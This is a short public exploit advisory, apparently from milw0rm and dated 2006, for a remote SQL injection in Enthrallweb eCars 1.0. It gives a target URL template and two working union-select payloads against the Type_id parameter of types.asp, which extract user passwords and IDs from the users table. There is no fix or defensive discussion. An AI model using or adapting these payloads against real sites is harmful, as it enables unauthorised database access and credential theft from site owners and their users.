******************************************************************************* # Title : Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.enthrallweb.us # $$ : 179.40 USD ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//Types.asp?Type_id=[SQL] Example: Home >> Pass //Types.asp?Type_id=-1%20union%20select%200,u_Password%20from%20users Home >> user //Types.asp?Type_id=-1%20union%20select%200,u_ID%20from%20users [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker! # milw0rm.com [2006-12-23]